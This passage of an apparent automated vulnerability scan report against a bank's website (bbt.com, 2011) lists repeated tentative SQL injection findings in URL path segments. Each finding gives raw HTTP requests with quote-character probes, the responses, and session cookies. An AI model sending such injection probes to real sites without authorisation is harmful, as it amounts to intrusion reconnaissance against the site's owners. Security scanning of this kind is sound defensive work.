Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:43 GMT
location: http://www.bbt.com/bbt/%27%27/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 129
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/">here</a>.</body>

1.22. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Business/Products/

Issue detail

Request 1

GET /bbt'/Business/Products/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/Business/Products/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:35 GMT
location: http://www.bbt.com/bbt/%27%27/Business/Products/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 147
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/Business/Products/">here</a>.</body>

1.23. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Business/Products/

Issue detail

Request 1

GET /bbt/Business'/Products/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:44 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/Business''/Products/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:45 GMT
location: http://www.bbt.com/bbt/Business%27%27/Products/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 146
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Business%27%27/Products/">here</a>.</body>

1.24. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Business/Products/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/Business/Products'/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:13:22 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/Business/Products''/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:13:22 GMT
location: http://www.bbt.com/bbt/Business/Products%27%27/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 146
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Business/Products%27%27/">here</a>.</body>

1.25. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Financial-Education/default.html

Issue detail

Request 1

GET /bbt'/Financial-Education/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:12 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/Financial-Education/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:13 GMT
location: http://www.bbt.com/bbt/%27%27/Financial-Education/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 161
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/Financial-Education/default.html">here</a>.</body>

1.26. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Financial-Education/default.html

Issue detail

Request 1

GET /bbt/Financial-Education'/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/Financial-Education''/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:35 GMT
location: http://www.bbt.com/bbt/Financial-Education%27%27/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 160
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Financial-Education%27%27/default.html">here</a>.</body>

1.27. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Financial-Education/default.html

Issue detail

Request 1

GET /bbt/Financial-Education/default.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

Request 2

GET /bbt/Financial-Education/default.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:45 GMT
location: http://www.bbt.com/bbt/Financial-Education/default.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 160
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Financial-Education/default.html%27%27">here</a>.</body>

1.28. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Personal/Products/

Issue detail

Request 1

GET /bbt'/Personal/Products/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:03 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/Personal/Products/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:03 GMT
location: http://www.bbt.com/bbt/%27%27/Personal/Products/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 147
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/Personal/Products/">here</a>.</body>

1.29. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Personal/Products/

Issue detail

Request 1

GET /bbt/Personal'/Products/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:29 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/Personal''/Products/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:30 GMT
location: http://www.bbt.com/bbt/Personal%27%27/Products/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 146
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Personal%27%27/Products/">here</a>.</body>

1.30. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/Personal/Products/

Issue detail

Request 1

GET /bbt/Personal/Products'/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:43 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/Personal/Products''/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:43 GMT
location: http://www.bbt.com/bbt/Personal/Products%27%27/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 146
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Personal/Products%27%27/">here</a>.</body>

1.31. http://www.bbt.com/bbt/about/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/

Issue detail

Request 1

GET /bbt'/about/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:57 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/about/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:59 GMT
location: http://www.bbt.com/bbt/%27%27/about/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 135
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/about/">here</a>.</body>

1.32. http://www.bbt.com/bbt/about/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/

Issue detail

Request 1

GET /bbt/about'/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:20 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about''/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
